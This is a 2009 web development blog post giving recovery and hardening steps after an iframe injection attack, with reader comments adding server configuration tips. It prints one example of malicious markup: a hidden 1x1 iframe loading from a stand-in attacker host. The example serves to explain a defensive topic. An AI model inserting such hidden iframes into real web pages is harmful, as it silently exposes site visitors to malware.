Web Development Blog

Twitter
We're offering a special website development package for businesses in Australia. Contact us today to find out more.

06 Apr, 2009

Troubleshooting an IFrame Injection Attack

Web Development » Troubleshooting, Tutorials » Troubleshooting an IFrame Injection Attack

IFrame Injection Attack is considered one of the most common and most basic cross site scripting (XSS) attacks. If you have recently got an iframe attack to your website, do not panic. Here are a few things that you can do immediately after you discovered that your website has been a victim of an iframe injection attack.

<iframe src="http://www.example-hacker-site.com/inject/?s=some-parameters" width="1" height="1" style="visibility: hidden"></iframe>
An example of a malicious IFRAME injection code

1. Take your website down for a certain period
It is recommended to take the website down as you do not want to be distributing malware or virus from your website to your visitors. The website should be offline while you are recovering the site.

2. Change all the passwords
Although this may seem like a simple step, many people, including myself, often fail to change all the passwords immediately after an attack has been discovered. You need to change all the passwords associated with the website; which include ftp passwords, ssh passwords, account passwords, database passwords, admin passwords and so on.

3. Take a copy of the affected website for further analysis
You may want to do a further analysis on the attack and might need to refer to the exact injection source code in the future. Take a copy of the affected website in a compressed format, eg: zip or gzip and store it in an quarantine area for later reference. Note that it is not advisable to keep the affected files on the server.

4. Replace the entire site with a clean backup copy
Do not rely on your hosting provider for a backup copy of your site. Many hosting providers say they do an automatic backup every night, however, it is more reliable if you have other backup solutions for your website. Scan your backup copy with Anti-Virus software like ZoneAlarm or Trend Micro (use cupon code trendpro to get 10% Off Trend Micro Internet Security Pro 2010) before uploading to the web server to ensure that the backup copy is free from viruses and Trojan horses.

5. Test the website and reopen
This is to make sure that the website is reverted to its clean, original version. Once you are happy with the result, you can reopen the website to the public.

6. Analyse how the attack was originated
In order to ensure that the same attack does not happen again, you will need to do a full analysis of the attack and how it was originated. Was it because of a security hole in your application? Was it caused by a weak file permission? Or is your server affected with some virus that injects these code into your website at regular interval? You will need to understand how it happens in order to prevent it in the future. And when necessary, obtain an expert advice.

7. Perform appropriate security measures based on the analysis
Although you may have recovered your website, it does not mean your website will not be attacked again. If the same security hole still exists, it is probably very likely that the website will be attacked again in the near future. Therefore, it is recommended that you perform necessary security measures, be it hardening your web server, upgrading an application, or introducing new security restrictions.

My experience and advice

I have encountered and recovered quite a few websites that had been attacked by malicious iframe exploit in the recent years. And the common causes seem to be as follows:

  • The website is hosted on a cheap web hosting service
  • The website is using an old version of an open source application (eg: WordPress 1.0) which has known security issues
  • File permissions on the server are not set accordingly (eg: every file and folder on the server is set to 777 – read-write-execute)
  • Weakness in an application code. For example, there is not sufficient input validation.
  • FTP rather than SFTP is used
  • There is no IP restriction for SSH and FTP accounts

There are a few simple things that can be done to reduce the risk of your website being attacked.

  • Change your passwords periodically (say, at least once a month)
  • Keep your applications up-to-date. Always upgrade immediately when a new version is available.
  • Clean up files and directories on the web server. Make sure there is no old file with .bak or .txt extensions lying around
  • Ensure that appropriate file permissions are used for every file and directory on the web server
  • Consult with a security expert to obtain the best advice

Other similiar posts that you might be interested in:

11 Responses to "Troubleshooting an IFrame Injection Attack"

1 | Akash Callikan

April 22nd, 2009 at 8:47 pm

Avatar

I’ve had the same problem on my test server these last few weeks. Thankfully I have nightly backups. Anyway, after some research I thought it might be related to PHP’s register_globals setting. Turns out I was right. The damn setting was on.

Now that I’ve cleared it, attacks have stopped. So you might wanna check if your host has left it on in php.ini. If you can’t edit your php.ini file, just add “php_flag register_globals off” at the top of your root .htaccess file.

Cheers :)

Akash

2 | Even I had the same problem

June 15th, 2009 at 8:00 pm

Avatar

I was facing the same problem from April.
Even now I dont know how to rectify it, I have used 20 Jquery files for usability and effects for my website.

I am searching for, still no permanent requiry.

If anybody want to help me on this issue pls…

Thanks
Mahes

3 | Matrix127

June 24th, 2009 at 10:41 am

Avatar

my website was attacked with this too

I had a back up so restored it, but what I didnt realise that I had back up with the i-frame injection, my website was on for an hour and then it was down again, did AV scan with Avast on the back up files and found the i-frame virus, deleted it, did a full scan on my pc and now I can get my website on, but even tho I will change the passwords and everthing I think this can still be a dangerous one cos if a visitor of your website has the same virus , they can easily infect you with it without knowing they had the virus, it can actualy be siiting on his website ready to fire if you have visited such website or have been redirected to it somehow, one of those is the Firefox pop ups, never accept anything pops up unless you have set it to do so, and if you do by mistake then you get redirected to the infected website and get infected yourself, and now you are the virus who goes and visits the websites and infect all which has no strong wall and with lots of ports open, one of the main and easy security on Firefox you should have is the “KeyScambler” anything you type becomes encrypted text, and not good for all but most is the AddBlock Plus which which is an add on for Firefox, this stops any link that you filter, so it may come handy for blocking lots of ads and stops you being directed to visit an infected site so that can infect you, these are my little suggestions to get more security on your pc and your webserver, and make sure you learn all about what file permission settings are all about, that will also give you some extra security.

all this information I gained through searches and trials and from my silly thinking that I had enough security set up, obviously not !, my only hope is that we never give up and fight back with these issues and help and share information with each other than hopefuly your wont be the next victim ! …

4 | Zyad Rujeedawa

July 2nd, 2009 at 3:38 pm

Avatar

For .net just add the following in the web.config file

This will prevent scripting attacks.

5 | Zyad Rujeedawa

July 2nd, 2009 at 3:44 pm

Avatar

Looks like this site has removed my coding :-) to prevent scripting attacks :-)

So in the web.config file, under system.web, just set the property validateRequest of the pages tag to TRUE.

6 | Reejesh

July 8th, 2009 at 7:40 am

Avatar

any such settings in .htacces file to prevent this ?

7 | Jovani

September 3rd, 2009 at 5:21 pm

Avatar

I have encountered the same problem.. good thing i have restored the site. But I was wondering what might have caused this kind of injection? Is my computer infected with a virus, is the server has the virus, or something..??

8 | Steve

November 10th, 2009 at 1:03 am

Avatar

Grab a copy of Upload Guardian for your VPS/dedicated server. It scans FTP/PHP uploads in real-time and blocks the attacking IP in the firewall.

9 | izdelava spletnih strani

December 5th, 2009 at 3:08 am

Avatar

I see you are experts for iframes and stuff. Can anyone help me i’m having trouble that i can’t open my pics with target=”_top” while in iframe?

10 | Website maintenance « WASRC

December 5th, 2009 at 1:17 pm

Avatar

[...] http://eisabainyo.net/weblog/2009/04/06/iframe-injection-attack/ [...]

11 | advertising

February 28th, 2010 at 5:51 pm

Avatar

cant you edit your .htacces file to prevent this

Comment Form

Categories

Hostgator - Website Hosting

Archives

Visit 99Designs.com
ebook
Subscribe to our newsletter and receive FREE e-book "7 Days Exercise to Build More Traffic To Your Blog"
Your name:  
Your email:  

Search


  • About
    The blog Web Development Blog is where I keep myself up to date with the latest technologies in the industry and share my ideas and thoug...
  • Adsense Tips and Tricks
    With personal and commercial blogs, community websites, and social pages becoming the hot topic of the Internet in the last few years, many...
  • Advertise With Us
    Web Development Blog is a blog about Web Development, Web Design, Web Applications, Web 2.0, AJAX, Search Engine Optimisation, Latest Techno...
  • Archive
    Grab yourself a cup of coffee or tea, sit back and browse through an archive of all the blog posts on Web Development Blog....
  • Choosing a Content Management System
    The most commonly asked question when it comes to Content Management System is whether to build or buy (pre-built). While there are many fa...
  • Coupons
    Use the following coupon codes, promos and discount codes to save money on web hosting, domain names, website templates, ebooks, software, p...
  • Customised WordPress Themes
    If you would like a customised WordPress theme for your blog or your website, read on: (or head to WordPress Themes page to get free WordPre...
  • Favourite Poems
    If by Rudyard Kipling If you can keep your head when all about you Are losing theirs and blaming it on you, If you can trust yourself w...
  • Favourites
    Books Web Development Books Magazines Glamour Reader's Digest Software Adobe Photoshop CS4 Trend Micro Antivirus + Antispyw...
  • How to Start a Blog?
    What's a blog? According to Wikipedia, a blog is a user-generated website where entries are made in journal style and displayed in a reve...
  • Introduction to JSP Standard Tag Library (JSTL Basics)
    Tag libraries to include in your .jsp page <%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %> &l...
  • Links
    Free Anonymous Proxy Increases your privacy and security on the Internet by using our free, fast and easy to use web proxy. data backu...
  • Making a Passive Income Online
    Passive income, in my opinion, means an income which does not require a lot of regular maintenance work or continuing effort. I have been t...
  • Online Distribution Channels
    One of the importances of any website or business is to bring your products or services to the right people and to reach the target audience...
  • Recent Projects
    Followings are some of the recent projects I have done in 2006 -- 2007. Check out my latest business venture Web design Sydney to get your...
  • Recommended Web Development Books
    Many developers often ask me what books I read and what books I recommend in regards to web development and web technologies such as AJAX, J...
  • Search
    Looking for something on Web Developement Blog? Use this search tool powered by Google Custom Search to find what you are looking for just ...
  • Seven Tips to Building an Online Presence for your Business
    1. Get a domain name for your business The first and foremost step in building an online presence is to secure a domain name for your busi...
  • Seven Tips to Increasing Your Website’s Traffic Using SEO
    SEO is the buzz word - many people have mentioned it and many have heard of it too, but very few people know how to implement it properly. ...
  • Subscribe
    Newsletter [newsletter] RSS 2.0 feeds Entries feed Comments feed Subscribe using your favourite web-based or desktop feed r...
  • Useful Linux Commands
    Find files older than 60 days find * -mtime +60 Delete files in backup folder which are older than 60 days rm -f `find /backup/ -mtime ...
  • Web Design Tips
    Nowadays, having a website for your business is like having a phone number. Almost every business has their own website, with their own doma...
  • Web Development Books
    Many developers often ask me what books I read and what books I recommend in regards to web development and web technologies such as AJAX, J...
  • Web Hosting Comparison Chart
    The following are some of the most popular web hosting providers. I have personally used the recommended ones. Hosting coupon codes will ...
  • Web Standards
    Web Standards is defined as a set of rules or specifications that should be followed when developing a website.  The main objectives o...
  • WordPress Themes
    All WordPress themes are designed and coded by esn studio, and licensed under GPL license. If you would like a customised WordPress theme fo...
  • Sam: Useful. I always forget the rel target one
  • Chronic Tinnitus: Hi, Thanks for taking the time to discuss a really confusing matter - I find Plesk so much more awkward than the cpanel that I'm used to. Thanks Chr
  • Serhiy: I personally liked the web hosting comparison chart. Especially the recommended *. I got Bluehost :) .-= Serhiy´s last blog ..

Interests

Web development, Web design, Open source technologies, Portal development, APIs, Web services, Social media applications, Search engine optimisation, Mobile application development, iPhone Apps, Web 2.0, Web 3.0, Latest Internet technologies

Misc.

  • bluehost Hosting $6.95/month
  • Joomla Templates

Copyright © 2010 Web Development Blog is proudly powered by WordPress. WordPress Themes

Fervens - C Theme is created by Design Disease for Smashing Magazine